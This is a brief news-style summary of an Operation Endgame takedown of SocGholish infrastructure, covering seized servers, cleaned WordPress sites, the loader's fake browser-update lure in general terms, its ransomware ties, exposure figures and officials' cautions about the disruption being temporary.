Overview
- Authorities seized 106 servers and domains and removed SocGholish infections from 14,971 WordPress sites during a coordinated Operation Endgame action announced on Thursday, June 18.
- SocGholish is a JavaScript web-injection loader that profiles visitors, uses traffic-distribution systems to route real users, and then shows fake browser-update prompts that install downloaders like GhoLoader.
- Security firms and police say the loader has long provided initial access for ransomware groups and has ties to TA569/Evil Corp, which researchers link to multiple ransomware and data-stealing campaigns.
- Industry telemetry shows broad exposure: Infoblox reported about 55% of its cloud customers tried to reach SocGholish infrastructure and ShadowServer found over 1.44 million compromised WordPress sites available in May, and affected site owners were notified and given cleanup steps such as changing credentials and enabling MFA.
- Officials and researchers cautioned the disruption may be temporary because operators can rebuild infrastructure, shift to other traffic-distribution services, or change delivery methods so continued monitoring and patching of CMS sites remain essential.